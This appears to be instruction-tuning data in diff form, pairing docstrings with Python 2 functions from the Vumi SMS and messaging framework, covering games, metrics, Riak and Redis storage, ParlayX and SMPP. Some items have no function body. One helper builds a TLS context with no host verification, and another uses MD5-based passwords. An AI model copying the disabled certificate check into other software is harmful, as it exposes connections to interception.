+ 'msg': self.msg,
+ }
+[INST] Handle an user input string.
+Parameters
+
+message : unicode
+Message received from user.. [/INST] def event(self, message):
+ message = message.lower()
+ if not message:
+ self.msg = u"Some input required please."
+ elif len(message) > 1:
+ self.msg = u"Single characters only please."
+ elif message == '0':
+ self.exit_code = self.DONE
+ self.msg = u"Game ended."
+ elif self.won():
+ self.exit_code = self.DONE_WANTS_NEW
+ elif message not in string.lowercase:
+ self.msg = u"Letters of the alphabet only please."
+ elif message in self.guesses:
+ self.msg = u"You've already guessed '%s'." % (message,)
+ else:
+ assert len(message) == 1
+ self.guesses.add(message)
+ log.msg("Message: %r, word: %r" % (message, self.word))
+ if message in self.word:
+ self.msg = u"Word contains at least one '%s'! :D" % (message,)
+ else:
+ self.msg = u"Word contains no '%s'. :(" % (message,)
+ if self.won():
+ self.msg = self.victory_message()
+[INST] Fetch a game for the given user ID.. [/INST] def load_game(self, msisdn):
+ game_key = self.game_key(msisdn)
+ state = yield self.session_manager.load_session(game_key)
+ if state:
+ game = HangmanGame.from_state(state)
+ else:
+ game = None
+ returnValue(game)
+[INST] Create a new game for the given user ID.. [/INST] def new_game(self, msisdn, random_word_url):
+ word = yield self.random_word(random_word_url)
+ word = word.strip().lower()
+ game = HangmanGame(word)
+ game_key = self.game_key(msisdn)
+ yield self.session_manager.create_session(game_key, **game.state())
+ returnValue(game)
+[INST] Save the game state for the given game.. [/INST] def save_game(self, msisdn, game):
+ game_key = self.game_key(msisdn)
+ state = game.state()
+ return self.session_manager.save_session(game_key, state)
+[INST] Find or create a hangman game for this player.
+Then process the user's message.. [/INST] def consume_user_message(self, msg):
+ log.msg("User message: %s" % msg['content'])
+ user_id = msg.user()
+ config = yield self.get_config(msg)
+ game = yield self.load_game(user_id)
+ if game is None:
+ game = yield self.new_game(user_id, config.random_word_url)
+ if msg['content'] is None:
+ self.reply_to(msg, game.draw_board(), True)
+ return
+ message = msg['content'].strip()
+ game.event(message)
+ continue_session = True
+ if game.exit_code == game.DONE:
+ yield self.delete_game(user_id)
+ continue_session = False
+ elif game.exit_code == game.DONE_WANTS_NEW:
+ game = yield self.new_game(user_id, config.random_word_url)
+ else:
+ yield self.save_game(user_id, game)
+ self.reply_to(msg, game.draw_board(), continue_session)
+[INST] Start the metric polling and publishing task.. [/INST] def start_polling(self):
+ self._task = LoopingCall(self.publish_metrics)
+ done = self._task.start(self._publish_interval, now=False)
+ done.addErrback(lambda failure: log.err(failure,
+ "MetricManager polling task died"))
+[INST] Stop the metric polling and publishing task.. [/INST] def stop_polling(self):
+ if self._task:
+ if self._task.running:
+ self._task.stop()
+ self._task = None
+[INST] Publish a single value for the given metric.. [/INST] def oneshot(self, metric, value):
+ self._oneshot_msgs.append(
+ (metric, [(int(time.time()), value)]))
+[INST] Register a new metric object to be managed by this metric set.
+A metric can be registered with only one metric set.. [/INST] def register(self, metric):
+ metric.manage(self)
+ self._metrics.append(metric)
+ if metric.name in self._metrics_lookup:
+ raise MetricRegistrationError("Duplicate metric name %s"
+ % metric.name)
+ self._metrics_lookup[metric.name] = metric
+ return metric
+[INST] Start publishing metrics in a loop.. [/INST] def start(self, channel):
+ if self._publisher is not None:
+ raise RuntimeError("Publisher already present.")
+ self._publisher = MetricPublisher()
+ self._publisher.start(channel)
+ self.start_polling()
+[INST] Called by :class:`MetricManager` when this metric is registered.. [/INST] def manage(self, manager):
+ if self._manager is not None:
+ raise MetricRegistrationError(
+ "Metric %s already registered with MetricManager with"
+ " prefix %s." % (self.name, self._manager.prefix))
+ self._manager = manager
+[INST] Raise an exception if closed, otherwise return underlying client.. [/INST] def _client(self):
+ if self._closed:
+ raise VumiRiakError("Can't use closed Riak client.")
+ return self._raw_client
+[INST] Purge all objects and buckets properties belonging to buckets with the
+given prefix.
+
+This operation should *ONLY* be used in tests.. [/INST] def _purge_all(self, bucket_prefix):
+ buckets = self._raw_client.get_buckets()
+ for bucket in buckets:
+ if bucket.name.startswith(bucket_prefix):
+ for key in bucket.get_keys():
+ obj = bucket.get(key)
+ obj.delete()
+ bucket.clear_properties()
+ if self._closed:
+ self.close()
+[INST] Call a function that touches the network and wrap the result in this
+class.. [/INST] def _call_and_wrap(self, func):
+ raise NotImplementedError("Subclasses must implement this.")
+[INST] Migrate keys from `keys_list` until there are none left.
+This method is expected to be called multiple times concurrently with
+all instances sharing the same `keys_list`.. [/INST] def migrate_keys(self, _result, keys_list, dry_run):
+ while keys_list:
+ key = keys_list.pop(0)
+ yield self.migrate_key(key, dry_run)
+[INST] Perform an index query to get all keys and migrate them.
+If `continuation` is provided, it will be used as the starting point
+for the query.. [/INST] def migrate_all_keys(self, continuation=None):
+ self.emit("Migrating ...")
+ emit_progress = lambda t: self.emit(
+ "%s object%s migrated." % (t, "" if t == 1 else "s"))
+ index_page = yield self.model.all_keys_page(
+ max_results=self.options["index-page-size"],
+ continuation=continuation)
+ yield self.migrate_pages(index_page, emit_progress)
+[INST] Acquire a tag from the pool (returns None if no tags are avaliable).. [/INST] def jsonrpc_acquire_tag(self, pool, owner=None, reason=None):
+ d = self.tagpool.acquire_tag(pool, owner, reason)
+ return d
+[INST] Acquire the specific tag (returns None if the tag is unavailable).. [/INST] def jsonrpc_acquire_specific_tag(self, tag, owner=None, reason=None):
+ d = self.tagpool.acquire_specific_tag(tag, owner, reason)
+ return d
+[INST] Delete the given pool and all associated metadata and tags.
+No tags from the pool may be inuse.. [/INST] def jsonrpc_purge_pool(self, pool):
+ return self.tagpool.purge_pool(pool)
+[INST] Return a list of all available pools.. [/INST] def jsonrpc_list_pools(self):
+ d = self.tagpool.list_pools()
+ d.addCallback(list)
+ return d
+[INST] Returns the owner of an acquired tag and why is was acquired.. [/INST] def jsonrpc_acquired_by(self, tag):
+ d = self.tagpool.acquired_by(tag)
+ d.addCallback(list)
+ return d
+[INST] Encode a unicode_string in a specific encoding and return
+the byte string.. [/INST] def encode(unicode_string, encoding, errors):
+[INST] Decode a bytestring in a specific encoding and return the
+unicode string. [/INST] def decode(byte_string, encoding, errors):
+[INST] Create a `ParlayXClient` instance.. [/INST] def _create_client(self, config):
+ return ParlayXClient(
+ service_provider_service_id=config.service_provider_service_id,
+ service_provider_id=config.service_provider_id,
+ service_provider_password=config.service_provider_password,
+ short_code=config.short_code,
+ endpoint=config.notification_endpoint_uri,
+ send_uri=config.remote_send_uri,
+ notification_uri=config.remote_notification_uri)
+[INST] Send a text message via the ParlayX client.. [/INST] def handle_outbound_message(self, message):
+ log.info('Sending SMS via ParlayX: %r' % (message.to_json(),))
+ transport_metadata = message.get('transport_metadata', {})
+ d = self._parlayx_client.send_sms(
+ message['to_addr'],
+ message['content'],
+ unique_correlator(message['message_id']),
+ transport_metadata.get('linkid'))
+ d.addErrback(self.handle_outbound_message_failure, message)
+ d.addCallback(
+ lambda requestIdentifier: self.publish_ack(
+ message['message_id'], requestIdentifier))
+ return d
+[INST] Handle incoming text messages from `SmsNotificationService` callbacks.. [/INST] def handle_raw_inbound_message(self, correlator, linkid, inbound_message):
+ log.info('Receiving SMS via ParlayX: %r: %r' % (
+ correlator, inbound_message,))
+ message_id = extract_message_id(correlator)
+ return self.publish_message(
+ message_id=message_id,
+ content=inbound_message.message,
+ to_addr=inbound_message.service_activation_number,
+ from_addr=inbound_message.sender_address,
+ provider='parlayx',
+ transport_type=self.transport_type,
+ transport_metadata=dict(linkid=linkid))
+[INST] Construct a unique message identifier from an existing message
+identifier.
+
+This is necessary for the cases where a ``TransportMessage`` needs to
+be transmitted, since ParlayX wants unique identifiers for all sent
+messages.. [/INST] def unique_correlator(message_id, _uuid=None):
+ if _uuid is None:
+ _uuid = uuid.uuid4()
+ return '%s:%s' % (message_id, _uuid)
+[INST] Extract the Vumi message identifier from a ParlayX correlator.. [/INST] def extract_message_id(correlator):
+ return correlator.split(':', 1)[0]
+[INST] Creates a dummy Vas2Nets request for testing our resources with. [/INST] def create_request(params={}, path='/', method='POST'):
+ request = DummyRequest(path)
+ request.method = method
+ request.args = params
+ return request
+[INST] Create and store an outbound message.. [/INST] def _create_outbound(self, tag=("pool", "tag"), by_batch=False,
+ content='outbound foo'):
+ add_kw, batch_id = yield self._maybe_batch(tag, by_batch)
+ msg = self.msg_helper.make_outbound(content)
+ msg_id = msg['message_id']
+ yield self.store.add_outbound_message(msg, **add_kw)
+ returnValue((msg_id, msg, batch_id))
+[INST] Create and store an inbound message.. [/INST] def _create_inbound(self, tag=("pool", "tag"), by_batch=False,
+ content='inbound foo'):
+ add_kw, batch_id = yield self._maybe_batch(tag, by_batch)
+ msg = self.msg_helper.make_inbound(
+ content, to_addr="+1234567810001", transport_type="sms")
+ msg_id = msg['message_id']
+ yield self.store.add_inbound_message(msg, **add_kw)
+ returnValue((msg_id, msg, batch_id))
+[INST] Format a normalized MSISDN as a URI that ParlayX will accept.. [/INST] def format_address(msisdn):
+ if not msisdn.startswith('+'):
+ raise ValueError('Only international format addresses are supported')
+ return 'tel:' + msisdn[1:]
+[INST] Format a `datetime` instance timestamp according to ParlayX
+requirements.. [/INST] def format_timestamp(when):
+ return when.strftime('%Y%m%d%H%M%S')
+[INST] Build a time-sensitive password for a request.. [/INST] def make_password(service_provider_id, service_provider_password,
+ timestamp):
+ return hashlib.md5(
+ service_provider_id +
+ service_provider_password +
+ timestamp).hexdigest()
+[INST] The current date and time.. [/INST] def _now(self):
+ return datetime.now()
+[INST] Register a notification delivery endpoint with the remote ParlayX
+service.. [/INST] def start_sms_notification(self):
+ body = NOTIFICATION_MANAGER_NS.startSmsNotification(
+ NOTIFICATION_MANAGER_NS.reference(
+ L.endpoint(self.endpoint),
+ L.interfaceName('notifySmsReception'),
+ L.correlator(self._service_correlator)),
+ NOTIFICATION_MANAGER_NS.smsServiceActivationNumber(
+ self.short_code))
+ header = self._make_header()
+ return self.perform_soap_request(
+ uri=self.notification_uri,
+ action='',
+ body=body,
+ header=header,
+ expected_faults=[ServiceException])
+[INST] Deregister notification delivery with the remote ParlayX service.. [/INST] def stop_sms_notification(self):
+ body = NOTIFICATION_MANAGER_NS.stopSmsNotification(
+ L.correlator(self._service_correlator))
+ header = self._make_header()
+ return self.perform_soap_request(
+ uri=self.notification_uri,
+ action='',
+ body=body,
+ header=header,
+ expected_faults=[ServiceException])
+[INST] Fetch the next page of results.. [/INST] def next_page(self):
+ if not self.has_next_page():
+ return succeed(None)
+ d = deferToThread(self._index_page.next_page)
+ d.addCallback(type(self))
+ d.addErrback(riakErrorHandler)
+ return d
+[INST] Call a function that touches the network and wrap the result in this
+class.. [/INST] def _call_and_wrap(self, func):
+ d = deferToThread(func)
+ d.addCallback(type(self))
+ return d
+[INST] Construct an appropriate configuration for the child worker.. [/INST] def construct_worker_config(self, worker_name):
+ config = deepcopy(self.config.get('defaults', {}))
+ config.update(self.config.get(worker_name, {}))
+ return config
+[INST] Mark a test method as needing Riak setup.. [/INST] def needs_riak(method):
+ method.needs_riak = True
+ return method
+[INST] Return a wrapper around `meth` that sets up a RiakManager.. [/INST] def wrap_riak_setup(deco, meth):
+ @wraps(meth)
+ def wrapper(self):
+ deco.setup_riak(self)
+ return meth(self)
+ return wrapper
+[INST] Return a wrapper around `meth` that sets up a TxRiakManager.. [/INST] def wrap_txriak_setup(deco, meth):
+ @wraps(meth)
+ def wrapper(self):
+ d = deco.setup_txriak(self)
+ return d.addCallback(lambda _: meth(self))
+ return wrapper
+[INST] Clean up the Riak manager on the given test class.. [/INST] def cleanup_manager(deco, self):
+ yield self.manager.purge_all()
+ yield self.manager.close_manager()
+[INST] Read various host and worker attributes and wrap them in a message. [/INST] def _beat(self):
+ attrs = self._gen_attrs_func()
+ msg = HeartBeatMessage(**attrs)
+ self.publish_message(msg)
+[INST] Check if we should stop throttling, and stop throttling if we should.
+At a high level, we try each throttled message in our list until all of
+them have been accepted by the SMSC, at which point we stop throttling.
+
+In more detail.
+
+We recursively process our list of throttled message_ids until either
+we have none left (at which point we stop throttling) or we find one we
+can successfully look up in our cache.
+
+When we find a message we can retry, we retry it and return. We remain
+throttled until the SMSC responds. If we're still throttled, the
+message_id gets appended to our list and another check is scheduled for
+later. If we're no longer throttled, this method gets called again
+immediately.
+
+When there are no more throttled message_ids in our list, we stop
+throttling.. [/INST] def _check_stop_throttling(self):
+ self._unthrottle_delayedCall = None
+ if not self.is_bound():
+ self.log.msg("Can't check throttling while unbound, trying later.")
+ self.check_stop_throttling()
+ return
+ if not self._throttled_pdus:
+ self.log.msg("No more throttled messages to retry.")
+ yield self.stop_throttling()
+ return
+ seq_no = self._throttled_pdus.pop(0)
+ pdu_data = yield self.message_stash.get_cached_pdu(seq_no)
+ yield self.retry_throttled_pdu(pdu_data, seq_no)
+[INST] Submit a concatenated SMS to the SMSC using the optional
+SAR parameter names in the various PDUS.. [/INST] def submit_csm_sar(
+ self, vumi_message_id, destination_addr,
+ reference_rollover=0x10000, **pdu_params):
+ split_msg = self.csm_split_message(pdu_params.pop('short_message'))
+ if len(split_msg) == 1:
+ sequence_numbers = yield self.submit_sm(
+ vumi_message_id, destination_addr, short_message=split_msg[0],
+ **pdu_params)
+ returnValue(sequence_numbers)
+ optional_parameters = pdu_params.pop('optional_parameters', {}).copy()
+ ref_num = yield self.sequence_generator.next()
+ sequence_numbers = []
+ yield self.message_stash.init_multipart_info(
+ vumi_message_id, len(split_msg))
+ for i, msg in enumerate(split_msg):
+ pdu_params = pdu_params.copy()
+ optional_parameters.update({
+ 'sar_msg_ref_num': (ref_num % reference_rollover),
+ 'sar_total_segments': len(split_msg),
+ 'sar_segment_seqnum': i + 1,
+ })
+ sequence_number = yield self.submit_sm(
+ vumi_message_id, destination_addr, short_message=msg,
+ optional_parameters=optional_parameters, **pdu_params)
+ sequence_numbers.extend(sequence_number)
+ returnValue(sequence_numbers)
+[INST] Submit a concatenated SMS to the SMSC using user data headers (UDH)
+in the message content.. [/INST] def submit_csm_udh(self, vumi_message_id, destination_addr, **pdu_params):
+ if 'esm_class' in pdu_params:
+ raise EsmeProtocolError(
+ 'Cannot specify esm_class, GSM spec sets this at 0x40 '
+ 'for concatenated messages using UDH.')
+ pdu_params = pdu_params.copy()
+ split_msg = self.csm_split_message(pdu_params.pop('short_message'))
+ if len(split_msg) == 1:
+ sequence_numbers = yield self.submit_sm(
+ vumi_message_id, destination_addr, short_message=split_msg[0],
+ **pdu_params)
+ returnValue(sequence_numbers)
+ ref_num = yield self.sequence_generator.next()
+ sequence_numbers = []
+ yield self.message_stash.init_multipart_info(
+ vumi_message_id, len(split_msg))
+ for i, msg in enumerate(split_msg):
+ pdu_params['esm_class'] = 0x40
+ udh = ''.join([
+ '\05',
+ '\00',
+ '\03',
+ chr(ref_num % 0xFF),
+ chr(len(split_msg)),
+ chr(i + 1),
+ ])
+ short_message = udh + msg
+ sequence_number = yield self.submit_sm(
+ vumi_message_id, destination_addr, short_message=short_message,
+ **pdu_params)
+ sequence_numbers.extend(sequence_number)
+ returnValue(sequence_numbers)
+[INST] Publish datapoints to a broker.. [/INST] def send_datapoints(self, exchange, queue, datapoints):
+ msg = MetricMessage()
+ msg.extend(datapoints)
+ self._broker.publish_message(exchange, queue, msg)
+[INST] Retrieve datapoints from a broker.. [/INST] def recv_datapoints(self, exchange, queue):
+ vumi_msgs = self._broker.get_messages(exchange, queue)
+ msgs = [MetricMessage.from_dict(vm.payload) for vm in vumi_msgs]
+ return [msg.datapoints() for msg in msgs]
+[INST] Return the channel if the recipient is a channel.
+Otherwise return None.. [/INST] def channel(self):
+ if self.recipient[:1] in ('#', '&', '$'):
+ return self.recipient
+ return None
+[INST] Called when bot has succesfully signed on to server.. [/INST] def signedOn(self):
+ log.msg("Attempting to join channels: %r" % (self.channels,))
+ for channel in self.channels:
+ self.join(channel)
+[INST] This will get called when the bot receives a message.. [/INST] def privmsg(self, sender, recipient, message):
+ irc_msg = IrcMessage(sender, 'PRIVMSG', recipient, message,
+ self.nickname)
+ self.publish_message(irc_msg)
+[INST] This will get called when the bot receives a notice.. [/INST] def noticed(self, sender, recipient, message):
+ irc_msg = IrcMessage(sender, 'NOTICE', recipient, message,
+ self.nickname)
+ self.publish_message(irc_msg)
+[INST] This will get called when the bot sees someone do an action.. [/INST] def action(self, sender, recipient, message):
+ irc_msg = IrcMessage(sender, 'ACTION', recipient, message,
+ self.nickname)
+ self.publish_message(irc_msg)
+[INST] Called when an IRC user changes their nickname.. [/INST] def irc_NICK(self, prefix, params):
+ old_nick = prefix.partition('!')[0]
+ new_nick = params[0]
+ log.msg("Nick changed from %r to %r" % (old_nick, new_nick))
+[INST] Generate an altered version of a nickname that caused a collision in an
+effort to create an unused related name for subsequent registration.. [/INST] def alterCollidedNick(self, nickname):
+ return nickname + '^'
+[INST] Non-recursively overlay a set of configuration dictionaries. [/INST] def overlay_configs(*configs):
+ config = {}
+ for overlay in configs:
+ config.update(overlay)
+ return config
+[INST] Parse an (usually) optional YAML config file.. [/INST] def read_yaml_config(config_file, optional=True):
+ if optional and config_file is None:
+ return {}
+ with file(config_file, 'r') as stream:
+ return yaml.load(stream, Loader=SafeLoaderWithInclude)
+[INST] Set a worker configuration option (overrides values
+specified in the file passed to --config).. [/INST] def opt_set_option(self, keyvalue):
+ key, _sep, value = keyvalue.partition(':')
+ self.set_options[key] = value
+[INST] Print out a usage message for the worker-class and exit. [/INST] def do_worker_help(self):
+ worker_class = load_class_by_string(self.worker_class)
+ self.emit(worker_class.__doc__)
+ config_class = getattr(worker_class, 'CONFIG_CLASS', None)
+ if config_class is not None:
+ self.emit(config_class.__doc__)
+ self.emit("")
+ self.exit()
+[INST] Build a `MockResponse` containing a SOAP envelope.. [/INST] def build(cls, code, body, header=None):
+ return cls(
+ code=code,
+ delivered_body=tostring(soap_envelope(body, header)))
+[INST] Helper for creating an ``notifySmsDeliveryReceipt`` element.. [/INST] def create_sms_delivery_receipt(correlator, address, delivery_status):
+ return NOTIFICATION_NS.notifySmsDeliveryReceipt(
+ NOTIFICATION_NS.correlator(correlator),
+ NOTIFICATION_NS.deliveryStatus(
+ L.address(format_address(normalize_address(address))),
+ L.deliveryStatus(delivery_status.name)))
+[INST] Logs a message via vumi.log .
+Sub-class should override this if they wish to log messages
+elsewhere. The `api` parameter is provided for use by such
+sub-classes.
+
+The `log` method should always return a deferred.. [/INST] def log(self, api, msg, level):
+ return succeed(log.msg(msg, logLevel=level))
+[INST] Use ClientContextFactory directly and set the method if necessary.
+This will perform no host verification at all.. [/INST] def _get_noverify_context(self):
+ from twisted.internet.ssl import ClientContextFactory
+ context_factory = ClientContextFactory()
+ if self.ssl_method is not None:
+ context_factory.method = self.ssl_method
+ return context_factory.getContext()
+[INST] Turn an ElementTree element into an object with named params.
+Not recursive!. [/INST] def receipt_to_namedtuple(element):
+ d = receipt_element_to_dict(element)
+ klass = namedtuple(element.tag, d.keys())
+ return klass._make(d.values())
+[INST] Returns an :class:`SmsSyncMsgInfo` instance for this request.
+May return a deferred that yields the actual result to its callback.. [/INST] def msginfo_for_request(self, request):
+ raise NotImplementedError("Sub-classes should implement"
+ " msginfo_for_request")
+[INST] Returns an :class:`SmsSyncMsgInfo` instance for this outbound
+message.
+
+May return a deferred that yields the actual result to its callback.. [/INST] def msginfo_for_message(self, msg):
+ raise NotImplementedError("Sub-classes should implement"
+ " msginfo_for_message")
+[INST] Update an outbound message's payload's transport_metadata to allow
+msginfo to be reconstructed from replies.. [/INST] def add_msginfo_metadata(self, payload, msginfo):
+ raise NotImplementedError("Sub-class should implement"
+ " add_msginfo_metadata")
+[INST] Gathers pending messages and sends a response including them.. [/INST] def _respond_with_pending_messages(self, msginfo, message_id, **kw):
+ outbound_ids = []
+ outbound_messages = []
+ account_key = self.key_for_account(msginfo.account_id)
+ while True:
+ msg_json = yield self.redis.lpop(account_key)
+ if msg_json is None:
+ break
+ msg = TransportUserMessage.from_json(msg_json)
+ outbound_ids.append(msg['message_id'])
+ outbound_messages.append({'to': msg['to_addr'],
+ 'message': msg['content'] or ''})
+ yield self._send_response(message_id, messages=outbound_messages, **kw)
+ for outbound_id in outbound_ids:
+ yield self.publish_ack(user_message_id=outbound_id,
+ sent_message_id=outbound_id)
+[INST] This is overridden in a subclass.. [/INST] def _get_transport_config(self, config):
+ cfg = self.default_config.copy()
+ cfg.update(config)
+ return cfg
+[INST] The test cases assume the new config, this flattens the
+config key word arguments value to match an old config
+layout without the processor configs.. [/INST] def _get_transport_config(self, config):
+ cfg = self.default_config.copy()
+ processor_config_keys = [
+ 'submit_short_message_processor_config',
+ 'deliver_short_message_processor_config',
+ 'delivery_report_processor_config',
+ ]
+ for config_key in processor_config_keys:
+ processor_config = config.pop(config_key, {})
+ for name, value in processor_config.items():
+ cfg[name] = value
+ cfg.update(config)
+ return cfg
+[INST] Create a SOAP body containing a SOAP fault.. [/INST] def _make_fault(*a, **kw):
+ return SOAP_ENV.Body(soap_fault(*a, **kw))
+[INST] Construct a manager from a dictionary of options.. [/INST] def _manager_from_config(cls, config, manager_config):
+ return cls(VumiRedis(**config), **manager_config)
+[INST] Delete *ALL* keys whose names start with this manager's key prefix.
+Use only in tests.. [/INST] def _purge_all(self):
+ for key in self.keys():
+ self.delete(key)
+[INST] A version of getPage that uses QuietHTTPClientFactory.. [/INST] def quiet_get_page(url, contextFactory=None, *args, **kwargs):
+ return _makeGetterFactory(
+ url,
+ QuietHTTPClientFactory,
+ contextFactory=contextFactory,
+ *args, **kwargs).deferred
+[INST] Construct a custom raven client and transport-set pair.
+The raven client assumes that sends via transports return success or
+failure immediate in a blocking fashion and doesn't provide transports
+access to the client.
+
+We circumvent this by constructing a once-off transport class and
+raven client pair that work together. Instances of the transport feed
+information back success and failure back to the client instance once
+deferreds complete.
+
+Pull-requests with better solutions welcomed.. [/INST] def vumi_raven_client(dsn, log_context_sentinel=None):
+ import raven
+ from raven.transport.base import TwistedHTTPTransport
+ from raven.transport.registry import TransportRegistry
+ remaining_deferreds = set()
+ if log_context_sentinel is None:
+ log_context_sentinel = DEFAULT_LOG_CONTEXT_SENTINEL
+ log_context = {log_context_sentinel: True}
+ class VumiRavenHTTPTransport(TwistedHTTPTransport):
+ scheme = ['http', 'https']
+ def _get_page(self, data, headers):
+ d = quiet_get_page(self._url, method='POST', postdata=data,
+ headers=headers)
+ self._track_deferred(d)
+ self._track_client_state(d)
+ return d
+ def _track_deferred(self, d):
+ remaining_deferreds.add(d)
+ d.addBoth(self._untrack_deferred, d)
+ def _untrack_deferred(self, result, d):
+ remaining_deferreds.discard(d)
+ return result
+ def _track_client_state(self, d):
+ d.addCallbacks(self._set_client_success, self._set_client_fail)
+ def _set_client_success(self, result):
+ client.state.set_success()
+ return result
+ def _set_client_fail(self, result):
+ client.state.set_fail()
+ return result
+ def send(self, data, headers):
+ d = self._get_page(data, headers)
+ d.addErrback(lambda f: log.err(f, **log_context))
+ class VumiRavenClient(raven.Client):
+ _registry = TransportRegistry(transports=[
+ VumiRavenHTTPTransport
+ ])
+ def teardown(self):
+ return DeferredList(remaining_deferreds)
+ client = VumiRavenClient(dsn)
+ return client
+[INST] Run once for each key.
+May return either the name of the key (if the key should
+be processed by later tasks), the new name of the key (if
+the key was renamed and should be processed by later tasks)
+or ``None`` (if the key has been deleted or should not be
+processed by further tasks).. [/INST] def process_key(self, key):
+ return key
+[INST] Print the given string and then a newline.. [/INST] def emit(self, s):
+ self.stdout.write(s)
+ self.stdout.write("\n")
+[INST] Apply all tasks to all keys.. [/INST] def run(self):
+ for task in self.tasks:
+ task.init(self, self.redis)
+ for task in self.tasks:
+ task.before()
+ for key in scan_keys(self.redis, self.match_pattern):
+ for task in self.tasks:
+ key = task.process_key(key)
+ if key is None:
+ break
+ for task in self.tasks:
+ task.after()
+[INST] Add any needed HTTP headers to the request.
+Often used to set the Content-Type header.. [/INST] def add_http_headers(request):
+[INST] Write any header bytes that need to be written to the request before
+messages.. [/INST] def write_row_header(request):
+[INST] Perform teardown required for router.. [/INST] def teardown_routing(self):
+ pass
+[INST] Dispatch an inbound user message to a publisher.. [/INST] def dispatch_inbound_message(self, msg):
+ raise NotImplementedError()
+[INST] Dispatch an event to a publisher.. [/INST] def dispatch_inbound_event(self, msg):
+ raise NotImplementedError()
+[INST] Dispatch an outbound user message to a publisher.. [/INST] def dispatch_outbound_message(self, msg):
+ raise NotImplementedError()
+[INST] Explicitly throw away events, because transports can't receive them.. [/INST] def dispatch_inbound_event(self, msg):
+ pass
+[INST] If we're only hooking transports up to each other, there are no
+outbound messages.. [/INST] def dispatch_outbound_message(self, msg):
+ pass
+[INST] Start and return the given MockHttpServer with suitable cleanup.. [/INST] def start_mock_server(self, mock_server):
+ self.add_cleanup(mock_server.stop)
+ d = mock_server.start()
+ return d.addCallback(lambda _: mock_server)
+[INST] Creates a manager, purges all the riak data with it, then closes it.. [/INST] def purge_txriak(self):
+ manager = self.create_txriak_manager()
+ yield manager.purge_all()
+ yield manager.close_manager()
+[INST] Creates and returns a TxRiakManager, handling cleanup.. [/INST] def create_txriak_manager(self):
+ try:
+ from vumi.persist.txriak_manager import TxRiakManager
+ except ImportError, e:
+ import_skip(e, 'riak', 'riak')
+ self.add_cleanup(self.purge_txriak)
+ return TxRiakManager.from_config({'bucket_prefix': 'test.'})
+[INST] Creates a manager, purges all the riak data with it, then closes it.. [/INST] def purge_riak(self):
+ manager = self.create_riak_manager()
+ manager.purge_all()
+ manager.close_manager()
+[INST] Creates and returns a RiakManager, handling cleanup.. [/INST] def create_riak_manager(self):
+ try:
+ from vumi.persist.riak_manager import RiakManager
+ except ImportError, e:
+ import_skip(e, 'riak', 'riak')
+ self.add_cleanup(self.purge_riak)
+ return RiakManager.from_config({'bucket_prefix': 'test.'})
+[INST] Set the TTL on multipart info hash to something small. We don't delete
+this in case there's still an in-flight operation that will recreate it
+without a TTL.. [/INST] def expire_multipart_info(self, message_id):
+ expiry = self.config.completed_multipart_info_expiry
+ return self.redis.expire(multipart_info_key(message_id), expiry)
+[INST] Does various setup work in order to be able to accurately
+store cached data for a batch_id.
+
+A call to this isn't necessary but good for general house keeping.. [/INST] def batch_start(self, batch_id, use_counters=True):
+ yield self.redis.sadd(self.batch_key(), batch_id)
+ yield self.init_status(batch_id)
+ if use_counters:
+ yield self.redis.set(self.inbound_count_key(batch_id), 0)
+ yield self.redis.set(self.outbound_count_key(batch_id), 0)
+ yield self.redis.set(self.event_count_key(batch_id), 0)
+[INST] Removes all cached values for the given batch_id, useful before
+a reconciliation happens to ensure that we start from scratch.
+
+This will reset all counters back to zero and will increment
+them as messages are received. If your UI depends on your
+cached values your UI values might be off while the
+reconciliation is taking place.. [/INST] def clear_batch(self, batch_id):
+ yield self.redis.delete(self.inbound_key(batch_id))
+ yield self.redis.delete(self.inbound_count_key(batch_id))
+ yield self.redis.delete(self.outbound_key(batch_id))
+ yield self.redis.delete(self.outbound_count_key(batch_id))
+ yield self.redis.delete(self.event_key(batch_id))
+ yield self.redis.delete(self.event_count_key(batch_id))
+ yield self.redis.delete(self.status_key(batch_id))
+ yield self.redis.delete(self.to_addr_key(batch_id))
+ yield self.redis.delete(self.from_addr_key(batch_id))
+ yield self.redis.srem(self.batch_key(), batch_id)
+[INST] Add an outbound message to the cache for the given batch_id. [/INST] def add_outbound_message(self, batch_id, msg):
+ timestamp = self.get_timestamp(msg['timestamp'])
+ yield self.add_outbound_message_key(
+ batch_id, msg['message_id'], timestamp)
+ yield self.add_to_addr(batch_id, msg['to_addr'])
+[INST] Add a message key, weighted with the timestamp to the batch_id.. [/INST] def add_outbound_message_key(self, batch_id, message_key, timestamp):
+ new_entry = yield self.redis.zadd(self.outbound_key(batch_id), **{
+ message_key.encode('utf-8'): timestamp,
+ })
+ if new_entry:
+ yield self.increment_event_status(batch_id, 'sent')
+ uses_counters = yield self.uses_counters(batch_id)
+ if uses_counters:
+ yield self.redis.incr(self.outbound_count_key(batch_id))
+ yield self.truncate_outbound_message_keys(batch_id)
+[INST] Add a count to all outbound message counters. (Used for recon.). [/INST] def add_outbound_message_count(self, batch_id, count):
+ yield self.increment_event_status(batch_id, 'sent', count)
+ yield self.redis.incr(self.outbound_count_key(batch_id), count)
+[INST] Add a count to all relevant event counters. (Used for recon.). [/INST] def add_event_count(self, batch_id, status, count):
+ yield self.increment_event_status(batch_id, status, count)
+ yield self.redis.incr(self.event_count_key(batch_id), count)
+[INST] Add an event to the cache for the given batch_id. [/INST] def add_event(self, batch_id, event):
+ event_id = event['event_id']
+ timestamp = self.get_timestamp(event['timestamp'])
+ new_entry = yield self.add_event_key(batch_id, event_id, timestamp)
+ if new_entry:
+ event_type = event['event_type']
+ yield self.increment_event_status(batch_id, event_type)
+ if event_type == 'delivery_report':
+ yield self.increment_event_status(
+ batch_id, '%s.%s' % (event_type, event['delivery_status']))
+[INST] Add the event key to the set of known event keys.
+Returns 0 if the key already exists in the set, 1 if it doesn't.. [/INST] def add_event_key(self, batch_id, event_key, timestamp):
+ uses_event_counters = yield self.uses_event_counters(batch_id)
+ if uses_event_counters:
+ new_entry = yield self.redis.zadd(self.event_key(batch_id), **{
+ event_key.encode('utf-8'): timestamp,
+ })
+ if new_entry:
+ yield self.redis.incr(self.event_count_key(batch_id))
+ yield self.truncate_event_keys(batch_id)
+ returnValue(new_entry)
+ else:
+ returnValue(False)
+ new_entry = yield self.redis.sadd(
+ self.event_key(batch_id), event_key)
+ returnValue(new_entry)
+[INST] Increment the status for the given event_type for the given batch_id.. [/INST] def increment_event_status(self, batch_id, event_type, count=1):
+ return self.redis.hincrby(self.status_key(batch_id), event_type, count)
+[INST] Add an inbound message to the cache for the given batch_id. [/INST] def add_inbound_message(self, batch_id, msg):
+ timestamp = self.get_timestamp(msg['timestamp'])
+ yield self.add_inbound_message_key(
+ batch_id, msg['message_id'], timestamp)
